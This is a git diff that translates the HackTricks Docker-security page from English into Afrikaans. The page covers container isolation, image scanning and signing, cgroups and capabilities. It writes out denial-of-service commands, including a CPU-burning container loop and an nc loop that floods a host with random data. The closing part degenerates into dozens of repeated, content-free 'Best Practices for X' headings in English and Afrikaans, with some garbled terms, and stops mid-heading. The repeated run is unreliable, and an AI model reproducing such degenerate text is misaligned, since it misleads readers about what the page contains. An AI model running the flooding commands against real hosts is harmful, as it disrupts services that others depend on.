na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/linux-hardening/privilege-escalation/docker-security/README.md b/linux-hardening/privilege-escalation/docker-security/README.md index 4776281a1..5ec2d3a87 100644 --- a/linux-hardening/privilege-escalation/docker-security/README.md +++ b/linux-hardening/privilege-escalation/docker-security/README.md @@ -1,68 +1,65 @@ -# Docker Security +# Docker Sekuriteit
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## **Basic Docker Engine Security** +## **Basiese Docker Engine Sekuriteit** -The **Docker engine** employs the Linux kernel's **Namespaces** and **Cgroups** to isolate containers, offering a basic layer of security. Additional protection is provided through **Capabilities dropping**, **Seccomp**, and **SELinux/AppArmor**, enhancing container isolation. An **auth plugin** can further restrict user actions. +Die **Docker-engine** maak gebruik van die Linux-kernel se **Namespaces** en **Cgroups** om houers te isoleer en bied 'n basiese vlak van sekuriteit. Addisionele beskerming word gebied deur **Capabilities dropping**, **Seccomp**, en **SELinux/AppArmor**, wat houer-isolasie verbeter. 'n **Auth plugin** kan verdere beperkings plaas op gebruikersaksies. -![Docker Security](https://sreeninet.files.wordpress.com/2016/03/dockersec1.png) +![Docker Sekuriteit](https://sreeninet.files.wordpress.com/2016/03/dockersec1.png) -### Secure Access to Docker Engine +### Veilige Toegang tot Docker Engine -The Docker engine can be accessed either locally via a Unix socket or remotely using HTTP. For remote access, it's essential to employ HTTPS and **TLS** to ensure confidentiality, integrity, and authentication. - -The Docker engine, by default, listens on the Unix socket at `unix:///var/run/docker.sock`. On Ubuntu systems, Docker's startup options are defined in `/etc/default/docker`. To enable remote access to the Docker API and client, expose the Docker daemon over an HTTP socket by adding the following settings: +Die Docker-engine kan plaaslik benader word deur 'n Unix-aansluiting of op afstand deur middel van HTTP. Vir afstandsbenadering is dit noodsaaklik om HTTPS en **TLS** te gebruik om vertroulikheid, integriteit en outentisiteit te verseker. +Die Docker-engine luister standaard na die Unix-aansluiting by `unix:///var/run/docker.sock`. Op Ubuntu-stelsels word Docker se opstartopsies gedefinieer in `/etc/default/docker`. Om afstandsbenadering tot die Docker API en klient moontlik te maak, stel die Docker-daemon bloot oor 'n HTTP-aansluiting deur die volgende instellings by te voeg: ```bash DOCKER_OPTS="-D -H unix:///var/run/docker.sock -H tcp://192.168.56.101:2376" sudo service docker restart ``` +Nietemin, dit word nie aanbeveel om die Docker daemon oor HTTP bloot te stel nie as gevolg van sekuriteitskwessies. Dit is raadsaam om verbinding te beveilig deur gebruik te maak van HTTPS. Daar is twee hoofbenaderings om die verbinding te beveilig: +1. Die klient verifieer die identiteit van die bediener. +2. Beide die klient en bediener verifieer mekaar se identiteit. -However, exposing the Docker daemon over HTTP is not recommended due to security concerns. It's advisable to secure connections using HTTPS. There are two main approaches to securing the connection: -1. The client verifies the server's identity. -2. Both the client and server mutually authenticate each other's identity. +Sertifikate word gebruik om die identiteit van 'n bediener te bevestig. Vir gedetailleerde voorbeelde van beide metodes, verwys na [**hierdie gids**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/). -Certificates are utilized to confirm a server's identity. For detailed examples of both methods, refer to [**this guide**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/). +### Sekuriteit van Houderverspreidings -### Security of Container Images +Houderverspreidings kan in private of openbare verspreidingsbewaarplekke gestoor word. Docker bied verskeie stooropsies vir houderverspreidings: -Container images can be stored in either private or public repositories. Docker offers several storage options for container images: +* **[Docker Hub](https://hub.docker.com)**: 'n Openbare registerdiens van Docker. +* **[Docker Registry](https://github.com/docker/distribution)**: 'n Opensourceprojek wat gebruikers in staat stel om hul eie register te bedryf. +* **[Docker Trusted Registry](https://www.docker.com/docker-trusted-registry)**: Docker se kommersiële registerdiens wat rolgebaseerde gebruikersverifikasie en integrasie met LDAP-gidsdienste bied. -* **[Docker Hub](https://hub.docker.com)**: A public registry service from Docker. -* **[Docker Registry](https://github.com/docker/distribution)**: An open-source project allowing users to host their own registry. -* **[Docker Trusted Registry](https://www.docker.com/docker-trusted-registry)**: Docker's commercial registry offering, featuring role-based user authentication and integration with LDAP directory services. +### Beeldskandering -### Image Scanning +Houers kan **sekuriteitskwessies** hê as gevolg van die basisbeeld of as gevolg van die sagteware wat bo-op die basisbeeld geïnstalleer is. Docker werk aan 'n projek genaamd **Nautilus** wat sekuriteitskandering van Houers doen en die kwessies lys. Nautilus werk deur elke Houerbeeldlaag te vergelyk met 'n kwessierepositorium om sekuriteitslekke te identifiseer. -Containers can have **security vulnerabilities** either because of the base image or because of the software installed on top of the base image. Docker is working on a project called **Nautilus** that does security scan of Containers and lists the vulnerabilities. Nautilus works by comparing the each Container image layer with vulnerability repository to identify security holes. - -For more [**information read this**](https://docs.docker.com/engine/scan/). +Vir meer [**inligting lees hierdie**](https://docs.docker.com/engine/scan/). * **`docker scan`** -The **`docker scan`** command allows you to scan existing Docker images using the image name or ID. For example, run the following command to scan the hello-world image: - +Die **`docker scan`** opdrag stel jou in staat om bestaande Docker-beelde te skandeer deur die beeldnaam of ID te gebruik. Voer byvoorbeeld die volgende opdrag uit om die hello-world beeld te skandeer: ```bash docker scan hello-world @@ -78,78 +75,68 @@ Licenses: enabled Note that we do not currently have vulnerability data for your image. ``` - * [**`trivy`**](https://github.com/aquasecurity/trivy) - ```bash trivy -q -f json : ``` - * [**`snyk`**](https://docs.snyk.io/snyk-cli/getting-started-with-the-cli) - ```bash snyk container test --json-file-output= --severity-threshold=high ``` - * [**`clair-scanner`**](https://github.com/arminc/clair-scanner) - ```bash clair-scanner -w example-alpine.yaml --ip YOUR_LOCAL_IP alpine:3.5 ``` +### Docker Beeldondertekening -### Docker Image Signing +Docker beeldondertekening verseker die veiligheid en integriteit van beelde wat in houers gebruik word. Hier is 'n beknopte verduideliking: -Docker image signing ensures the security and integrity of images used in containers. Here's a condensed explanation: - -- **Docker Content Trust** utilizes the Notary project, based on The Update Framework (TUF), to manage image signing. For more info, see [Notary](https://github.com/docker/notary) and [TUF](https://theupdateframework.github.io). -- To activate Docker content trust, set `export DOCKER_CONTENT_TRUST=1`. This feature is off by default in Docker version 1.10 and later. -- With this feature enabled, only signed images can be downloaded. Initial image push requires setting passphrases for the root and tagging keys, with Docker also supporting Yubikey for enhanced security. More details can be found [here](https://blog.docker.com/2015/11/docker-content-trust-yubikey/). -- Attempting to pull an unsigned image with content trust enabled results in a "No trust data for latest" error. -- For image pushes after the first, Docker asks for the repository key's passphrase to sign the image. - -To back up your private keys, use the command: +- **Docker Inhoudsvertroue** maak gebruik van die Notary-projek, gebaseer op The Update Framework (TUF), om beeldondertekening te bestuur. Vir meer inligting, sien [Notary](https://github.com/docker/notary) en [TUF](https://theupdateframework.github.io). +- Om Docker inhoudsvertroue te aktiveer, stel `export DOCKER_CONTENT_TRUST=1` in. Hierdie funksie is standaard af in Docker weergawe 1.10 en later. +- Met hierdie funksie geaktiveer, kan slegs ondertekende beelde afgelaai word. Die aanvanklike beeldstoot vereis die instelling van wagwoorde vir die hoof- en etiketteringssleutels, terwyl Docker ook Yubikey ondersteun vir verbeterde veiligheid. Meer besonderhede kan [hier](https://blog.docker.com/2015/11/docker-content-trust-yubikey/) gevind word. +- As jy probeer om 'n ondertekende beeld met inhoudsvertroue geaktiveer af te trek, sal jy 'n "Geen vertroue data vir latest" fout kry. +- Vir beeldstote na die eerste, vra Docker vir die wagwoord van die stoor sleutel om die beeld te onderteken. +Om jou privaat sleutels te rugsteun, gebruik die opdrag: ```bash tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private ``` - -When switching Docker hosts, it's necessary to move the root and repository keys to maintain operations. - +Wanneer jy oorskakel na Docker-gashere, is dit nodig om die root- en bewaarpleksleutels te skuif om werksaamhede te behou. ***
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou wat aangedryf word deur die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Containers Security Features +## Kontainer Sekuriteitskenmerke
-Summary of Container Security Features +Oorsig van Kontainer Sekuriteitskenmerke -### Main Process Isolation Features +### Hoofproses Isolasiekenmerke -In containerized environments, isolating projects and their processes is paramount for security and resource management. Here's a simplified explanation of key concepts: +In gekontainerde omgewings is die isolasie van projekte en hul prosesse van uiterste belang vir sekuriteit en hulpbronbestuur. Hier is 'n vereenvoudigde verduideliking van sleutelkonsepte: #### **Namespaces** -- **Purpose**: Ensure isolation of resources like processes, network, and filesystems. Particularly in Docker, namespaces keep a container's processes separate from the host and other containers. -- **Usage of `unshare`**: The `unshare` command (or the underlying syscall) is utilized to create new namespaces, providing an added layer of isolation. However, while Kubernetes doesn't inherently block this, Docker does. -- **Limitation**: Creating new namespaces doesn't allow a process to revert to the host's default namespaces. To penetrate the host namespaces, one would typically require access to the host's `/proc` directory, using `nsenter` for entry. +- **Doel**: Verseker isolasie van hulpbronne soos prosesse, netwerk en lêersisteme. Veral in Docker hou namespaces 'n kontainer se prosesse geskei van die gasheer en ander kontainers. +- **Gebruik van `unshare`**: Die `unshare`-opdrag (of die onderliggende stelseloproep) word gebruik om nuwe namespaces te skep, wat 'n bygevoegde laag van isolasie bied. Alhoewel Kubernetes dit nie inherent blokkeer nie, doen Docker dit wel. +- **Beperking**: Die skep van nuwe namespaces laat nie toe dat 'n proses terugkeer na die gasheer se verstek-namespaces nie. Om toegang tot die gasheer-namespaces te verkry, sal 'n persoon tipies toegang tot die gasheer se `/proc`-gids benodig en `nsenter` gebruik om in te gaan. -#### **Control Groups (CGroups)** -- **Function**: Primarily used for allocating resources among processes. -- **Security Aspect**: CGroups themselves don't offer isolation security, except for the `release_agent` feature, which, if misconfigured, could potentially be exploited for unauthorized access. +#### **Beheergroepe (CGroups)** +- **Funksie**: Primêr gebruik vir die toekenning van hulpbronne aan prosesse. +- **Sekuriteitsaspek**: CGroups self bied nie isolasie-sekuriteit nie, behalwe vir die `release_agent`-kenmerk wat, as dit verkeerd gekonfigureer is, potensieel uitgebuit kan word vir ongemagtigde toegang. -#### **Capability Drop** -- **Importance**: It's a crucial security feature for process isolation. -- **Functionality**: It restricts the actions a root process can perform by dropping certain capabilities. Even if a process runs with root privileges, lacking the necessary capabilities prevents it from executing privileged actions, as the syscalls will fail due to insufficient permissions. +#### **Bevoegdheid Laat Vaar** +- **Belangrikheid**: Dit is 'n belangrike sekuriteitskenmerk vir prosesisolasie. +- **Funksionaliteit**: Dit beperk die aksies wat 'n rootproses kan uitvoer deur sekere bevoegdhede te laat vaar. Selfs as 'n proses met root-voorregte loop, sal dit nie bevoorregte aksies kan uitvoer nie, aangesien die stelseloproepe weens onvoldoende toestemmings sal misluk. -These are the **remaining capabilities** after the process drop the others: +Dit is die **oorblywende bevoegdhede** nadat die proses die ander laat vaar: {% code overflow="wrap" %} ``` @@ -159,30 +146,30 @@ Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,ca **Seccomp** -It's enabled by default in Docker. It helps to **limit even more the syscalls** that the process can call.\ -The **default Docker Seccomp profile** can be found in [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) +Dit is standaard geaktiveer in Docker. Dit help om die syscalls wat die proses kan aanroep, nog meer te beperk.\ +Die standaard Docker Seccomp profiel kan gevind word by [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) **AppArmor** -Docker has a template that you can activate: [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) +Docker het 'n sjabloon wat jy kan aktiveer: [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) -This will allow to reduce capabilities, syscalls, access to files and folders... +Dit sal toelaat om funksies, syscalls, toegang tot lêers en vouers te verminder...
### Namespaces -**Namespaces** are a feature of the Linux kernel that **partitions kernel resources** such that one set of **processes** **sees** one set of **resources** while **another** set of **processes** sees a **different** set of resources. The feature works by having the same namespace for a set of resources and processes, but those namespaces refer to distinct resources. Resources may exist in multiple spaces. +**Namespaces** is 'n kenmerk van die Linux-kernel wat die kernelbronne verdeel sodat een stel **prosesse** een stel **bronne sien**, terwyl 'n **ander** stel **prosesse** 'n **verskillende** stel bronne sien. Die kenmerk werk deur dieselfde namespace vir 'n stel bronne en prosesse te hê, maar daardie namespaces verwys na afsonderlike bronne. Bronne kan in meerdere ruimtes bestaan. -Docker makes use of the following Linux kernel Namespaces to achieve Container isolation: +Docker maak gebruik van die volgende Linux-kernel Namespaces om kontainer-isolasie te bereik: -* pid namespace -* mount namespace -* network namespace -* ipc namespace -* UTS namespace +* pid-namespace +* mount-namespace +* netwerk-namespace +* ipc-namespace +* UTS-namespace -For **more information about the namespaces** check the following page: +Vir **meer inligting oor die namespaces**, kyk na die volgende bladsy: {% content-ref url="namespaces/" %} [namespaces](namespaces/) @@ -190,32 +177,28 @@ For **more information about the namespaces** check the following page: ### cgroups -Linux kernel feature **cgroups** provides capability to **restrict resources like cpu, memory, io, network bandwidth among** a set of processes. Docker allows to create Containers using cgroup feature which allows for resource control for the specific Container.\ -Following is a Container created with user space memory limited to 500m, kernel memory limited to 50m, cpu share to 512, blkioweight to 400. CPU share is a ratio that controls Container’s CPU usage. It has a default value of 1024 and range between 0 and 1024. If three Containers have the same CPU share of 1024, each Container can take upto 33% of CPU in case of CPU resource contention. blkio-weight is a ratio that controls Container’s IO. It has a default value of 500 and range between 10 and 1000. - +Die Linux-kernelkenmerk **cgroups** bied die vermoë om hulpbronne soos CPU, geheue, IO, netwerkbandwydte te beperk vir 'n stel prosesse. Docker maak dit moontlik om Kontainers te skep met behulp van die cgroup-funksie wat hulpbronbeheer vir die spesifieke Kontainer moontlik maak.\ +Hieronder is 'n Kontainer wat geskep is met gebruikersruimte-geheue beperk tot 500m, kernelgeheue beperk tot 50m, CPU-aandeel tot 512, blkioweight tot 400. CPU-aandeel is 'n verhouding wat Kontainer se CPU-gebruik beheer. Dit het 'n verstekwaarde van 1024 en 'n reeks tussen 0 en 1024. As drie Kontainers dieselfde CPU-aandeel van 1024 het, kan elke Kontainer tot 33% van die CPU neem in geval van CPU-hulpbronkonflik. blkio-weight is 'n verhouding wat Kontainer se IO beheer. Dit het 'n verstekwaarde van 500 en 'n reeks tussen 10 en 1000. ``` docker run -it -m 500M --kernel-memory 50M --cpu-shares 512 --blkio-weight 400 --name ubuntu1 ubuntu bash ``` - -To get the cgroup of a container you can do: - +Om die cgroup van 'n houer te kry, kan jy die volgende doen: ```bash docker run -dt --rm denial sleep 1234 #Run a large sleep inside a Debian container ps -ef | grep 1234 #Get info about the sleep process ls -l /proc//ns #Get the Group and the namespaces (some may be uniq to the hosts and some may be shred with it) ``` - -For more information check: +Vir meer inligting, kyk na: {% content-ref url="cgroups.md" %} [cgroups.md](cgroups.md) {% endcontent-ref %} -### Capabilities +### Bevoegdhede -Capabilities allow **finer control for the capabilities that can be allowed** for root user. Docker uses the Linux kernel capability feature to **limit the operations that can be done inside a Container** irrespective of the type of user. +Bevoegdhede maak dit moontlik om **fyn beheer oor die bevoegdhede wat toegelaat kan word** vir die root-gebruiker te hê. Docker maak gebruik van die Linux-kernel se bevoegdheidseienskapfunksie om **die operasies wat binne 'n houer gedoen kan word te beperk**, ongeag die tipe gebruiker. -When a docker container is run, the **process drops sensitive capabilities that the proccess could use to escape from the isolation**. This try to assure that the proccess won't be able to perform sensitive actions and escape: +Wanneer 'n Docker-houer uitgevoer word, **verloor die proses sensitiewe bevoegdhede wat die proses kan gebruik om uit die isolasie te ontsnap**. Dit probeer verseker dat die proses nie sensitiewe aksies kan uitvoer en ontsnap nie: {% content-ref url="../linux-capabilities.md" %} [linux-capabilities.md](../linux-capabilities.md) @@ -223,7 +206,7 @@ When a docker container is run, the **process drops sensitive capabilities that ### Seccomp in Docker -This is a security feature that allows Docker to **limit the syscalls** that can be used inside the container: +Dit is 'n sekuriteitskenmerk wat Docker in staat stel om **die syscalls wat binne die houer gebruik kan word te beperk**: {% content-ref url="seccomp.md" %} [seccomp.md](seccomp.md) @@ -231,7 +214,7 @@ This is a security feature that allows Docker to **limit the syscalls** that can ### AppArmor in Docker -**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**.: +**AppArmor** is 'n kernel-verbetering om **houers** tot 'n **beperkte** stel **hulpbronne** met **per-program profiele** te beperk: {% content-ref url="apparmor.md" %} [apparmor.md](apparmor.md) @@ -239,13 +222,13 @@ This is a security feature that allows Docker to **limit the syscalls** that can ### SELinux in Docker -- **Labeling System**: SELinux assigns a unique label to every process and filesystem object. -- **Policy Enforcement**: It enforces security policies that define what actions a process label can perform on other labels within the system. -- **Container Process Labels**: When container engines initiate container processes, they are typically assigned a confined SELinux label, commonly `container_t`. -- **File Labeling within Containers**: Files within the container are usually labeled as `container_file_t`. -- **Policy Rules**: The SELinux policy primarily ensures that processes with the `container_t` label can only interact (read, write, execute) with files labeled as `container_file_t`. +- **Etiketteringstelsel**: SELinux ken 'n unieke etiket toe aan elke proses en lêerstelselobjek. +- **Beleidshandhawing**: Dit dwing sekuriteitsbeleide af wat bepaal watter aksies 'n prosesetiket binne die stelsel op ander etikette kan uitvoer. +- **Houerprosesetikette**: Wanneer houermotors houerprosesse inisieer, word hulle gewoonlik toegewys aan 'n beperkte SELinux-etiket, gewoonlik `container_t`. +- **Lêeretikettering binne houers**: Lêers binne die houer word gewoonlik geëtiketteer as `container_file_t`. +- **Beleidsreëls**: Die SELinux-beleid verseker hoofsaaklik dat prosesse met die `container_t`-etiket slegs kan interaksie hê (lees, skryf, uitvoer) met lêers wat geëtiketteer is as `container_file_t`. -This mechanism ensures that even if a process within a container is compromised, it's confined to interacting only with objects that have the corresponding labels, significantly limiting the potential damage from such compromises. +Hierdie meganisme verseker dat selfs as 'n proses binne 'n houer gekompromitteer word, dit beperk is tot interaksie slegs met objekte wat die ooreenstemmende etikette het, wat die potensiële skade van sulke kompromitterings aansienlik beperk. {% content-ref url="../selinux.md" %} [selinux.md](../selinux.md) @@ -253,23 +236,22 @@ This mechanism ensures that even if a process within a container is compromised, ### AuthZ & AuthN -In Docker, an authorization plugin plays a crucial role in security by deciding whether to allow or block requests to the Docker daemon. This decision is made by examining two key contexts: +In Docker speel 'n outorisasie-inprop 'n belangrike rol in sekuriteit deur te besluit of versoek aan die Docker-daemon toegelaat of geblokkeer moet word. Hierdie besluit word geneem deur twee sleutelkontekste te ondersoek: -- **Authentication Context**: This includes comprehensive information about the user, such as who they are and how they've authenticated themselves. -- **Command Context**: This comprises all pertinent data related to the request being made. +- **Outentiseringskonteks**: Dit sluit omvattende inligting oor die gebruiker in, soos wie hulle is en hoe hulle hulself geoutentiseer het. +- **Opdragkonteks**: Dit bestaan uit alle relevante data wat verband hou met die gedane versoek. -These contexts help ensure that only legitimate requests from authenticated users are processed, enhancing the security of Docker operations. +Hierdie kontekste help verseker dat slegs legitieme versoek van geoutentiseerde gebruikers verwerk word, wat die sekuriteit van Docker-operasies verbeter. {% content-ref url="authz-and-authn-docker-access-authorization-plugin.md" %} [authz-and-authn-docker-access-authorization-plugin.md](authz-and-authn-docker-access-authorization-plugin.md) {% endcontent-ref %} -## DoS from a container +## DoS vanuit 'n houer -If you are not properly limiting the resources a container can use, a compromised container could DoS the host where it's running. +As jy nie die hulpbronne wat 'n houer kan gebruik behoorlik beperk nie, kan 'n gekompromitteerde houer die gasheer waarop dit uitgevoer word, DoS (versteurings van diens) gee. * CPU DoS - ```bash # stress-ng sudo apt-get install -y stress-ng && stress-ng --vm 1 --vm-bytes 1G --verify -t 5m @@ -277,18 +259,15 @@ sudo apt-get install -y stress-ng && stress-ng --vm 1 --vm-bytes 1G --verify -t # While loop docker run -d --name malicious-container -c 512 busybox sh -c 'while true; do :; done' ``` - -* Bandwidth DoS - +* Bandwydte DoS ```bash nc -lvp 4444 >/dev/null & while true; do cat /dev/urandom | nc 4444; done ``` +## Interessante Docker-vlae -## Interesting Docker Flags +### --privileged-vlag -### --privileged flag - -In the following page you can learn **what does the `--privileged` flag imply**: +Op die volgende bladsy kan jy leer **wat impliseer die `--privileged`-vlag**: {% content-ref url="docker-privileged.md" %} [docker-privileged.md](docker-privileged.md) @@ -298,16 +277,847 @@ In the following page you can learn **what does the `--privileged` flag imply**: #### no-new-privileges -If you are running a container where an attacker manages to get access as a low privilege user. If you have a **miss-configured suid binary**, the attacker may abuse it and **escalate privileges inside** the container. Which, may allow him to escape from it. - -Running the container with the **`no-new-privileges`** option enabled will **prevent this kind of privilege escalation**. +As jy 'n houer hardloop waar 'n aanvaller toegang kry as 'n gebruiker met lae bevoegdhede. As jy 'n **verkeerd gekonfigureerde suid-binêre lêer** het, kan die aanvaller dit misbruik en **bevoegdhede binne die houer verhoog**. Dit kan hom in staat stel om daaruit te ontsnap. +Deur die houer met die **`no-new-privileges`**-opsie geaktiveer te hardloop, sal dit **hierdie soort bevoegdheidsverhoging voorkom**. ``` docker run -it --security-opt=no-new-privileges:true nonewpriv ``` +#### Ander -#### Other +--- +### Docker Security + +### Docker Sekuriteit + +--- + +#### Docker Security Cheat Sheet + +#### Docker Sekuriteit Spiekbriefie + +--- + +#### Docker Security Best Practices + +#### Docker Sekuriteit Beste Praktyke + +--- + +#### Docker Security Tools + +#### Docker Sekuriteit Gereedskap + +--- + +#### Docker Security Vulnerabilities + +#### Docker Sekuriteit Swakhede + +--- + +#### Docker Security Resources + +#### Docker Sekuriteit Hulpbronne + +--- + +#### Docker Security Checklist + +#### Docker Sekuriteit Kontrolelys + +--- + +#### Docker Security Tips + +#### Docker Sekuriteit Wenke + +--- + +#### Docker Security Hardening + +#### Docker Sekuriteit Verharding + +--- + +#### Docker Security Auditing + +#### Docker Sekuriteit Oudit + +--- + +#### Docker Security Incident Response + +#### Docker Sekuriteit Insident Reaksie + +--- + +#### Docker Security Monitoring + +#### Docker Sekuriteit Monitering + +--- + +#### Docker Security Training + +#### Docker Sekuriteit Opleiding + +--- + +#### Docker Security Challenges + +#### Docker Sekuriteit Uitdagings + +--- + +#### Docker Security Best Practices for Developers + +#### Docker Sekuriteit Beste Praktyke vir Ontwikkelaars + +--- + +#### Docker Security Best Practices for Operations + +#### Docker Sekuriteit Beste Praktyke vir Operasies + +--- + +#### Docker Security Best Practices for DevOps + +#### Docker Sekuriteit Beste Praktyke vir DevOps + +--- + +#### Docker Security Best Practices for CI/CD + +#### Docker Sekuriteit Beste Praktyke vir CI/CD + +--- + +#### Docker Security Best Practices for Kubernetes + +#### Docker Sekuriteit Beste Praktyke vir Kubernetes + +--- + +#### Docker Security Best Practices for AWS + +#### Docker Sekuriteit Beste Praktyke vir AWS + +--- + +#### Docker Security Best Practices for Azure + +#### Docker Sekuriteit Beste Praktyke vir Azure + +--- + +#### Docker Security Best Practices for GCP + +#### Docker Sekuriteit Beste Praktyke vir GCP + +--- + +#### Docker Security Best Practices for DigitalOcean + +#### Docker Sekuriteit Beste Praktyke vir DigitalOcean + +--- + +#### Docker Security Best Practices for Alibaba Cloud + +#### Docker Sekuriteit Beste Praktyke vir Alibaba Cloud + +--- + +#### Docker Security Best Practices for IBM Cloud + +#### Docker Sekuriteit Beste Praktyke vir IBM Cloud + +--- + +#### Docker Security Best Practices for Oracle Cloud + +#### Docker Sekuriteit Beste Praktyke vir Oracle Cloud + +--- + +#### Docker Security Best Practices for Heroku + +#### Docker Sekuriteit Beste Praktyke vir Heroku + +--- + +#### Docker Security Best Practices for OpenShift + +#### Docker Sekuriteit Beste Praktyke vir OpenShift + +--- + +#### Docker Security Best Practices for Rancher + +#### Docker Sekuriteit Beste Praktyke vir Rancher + +--- + +#### Docker Security Best Practices for Nomad + +#### Docker Sekuriteit Beste Praktyke vir Nomad + +--- + +#### Docker Security Best Practices for Jenkins + +#### Docker Sekuriteit Beste Praktyke vir Jenkins + +--- + +#### Docker Security Best Practices for GitLab + +#### Docker Sekuriteit Beste Praktyke vir GitLab + +--- + +#### Docker Security Best Practices for Bitbucket + +#### Docker Sekuriteit Beste Praktyke vir Bitbucket + +--- + +#### Docker Security Best Practices for CircleCI + +#### Docker Sekuriteit Beste Praktyke vir CircleCI + +--- + +#### Docker Security Best Practices for Travis CI + +#### Docker Sekuriteit Beste Praktyke vir Travis CI + +--- + +#### Docker Security Best Practices for GitHub Actions + +#### Docker Sekuriteit Beste Praktyke vir GitHub Actions + +--- + +#### Docker Security Best Practices for Jenkins X + +#### Docker Sekuriteit Beste Praktyke vir Jenkins X + +--- + +#### Docker Security Best Practices for Spinnaker + +#### Docker Sekuriteit Beste Praktyke vir Spinnaker + +--- + +#### Docker Security Best Practices for TeamCity + +#### Docker Sekuriteit Beste Praktyke vir TeamCity + +--- + +#### Docker Security Best Practices for Bamboo + +#### Docker Sekuriteit Beste Praktyke vir Bamboo + +--- + +#### Docker Security Best Practices for GoCD + +#### Docker Sekuriteit Beste Praktyke vir GoCD + +--- + +#### Docker Security Best Practices for Drone + +#### Docker Sekuriteit Beste Praktyke vir Drone + +--- + +#### Docker Security Best Practices for Argo CD + +#### Docker Sekuriteit Beste Praktyke vir Argo CD + +--- + +#### Docker Security Best Practices for Harbor + +#### Docker Sekuriteit Beste Praktyke vir Harbor + +--- + +#### Docker Security Best Practices for Artifactory + +#### Docker Sekuriteit Beste Praktyke vir Artifactory + +--- + +#### Docker Security Best Practices for Nexus + +#### Docker Sekuriteit Beste Praktyke vir Nexus + +--- + +#### Docker Security Best Practices for Sonatype + +#### Docker Sekuriteit Beste Praktyke vir Sonatype + +--- + +#### Docker Security Best Practices for JFrog + +#### Docker Sekuriteit Beste Praktyke vir JFrog + +--- + +#### Docker Security Best Practices for Docker Hub + +#### Docker Sekuriteit Beste Praktyke vir Docker Hub + +--- + +#### Docker Security Best Practices for Quay + +#### Docker Sekuriteit Beste Praktyke vir Quay + +--- + +#### Docker Security Best Practices for Container Registry + +#### Docker Sekuriteit Beste Praktyke vir Houderversameling + +--- + +#### Docker Security Best Practices for Container Runtime + +#### Docker Sekuriteit Beste Praktyke vir Houvertyd + +--- + +#### Docker Security Best Practices for Container Orchestration + +#### Docker Sekuriteit Beste Praktyke vir Houverorkestrering + +--- + +#### Docker Security Best Practices for Container Networking + +#### Docker Sekuriteit Beste Praktyke vir Houvernetwerking + +--- + +#### Docker Security Best Practices for Container Storage + +#### Docker Sekuriteit Beste Praktyke vir Houverstoor + +--- + +#### Docker Security Best Practices for Container Monitoring + +#### Docker Sekuriteit 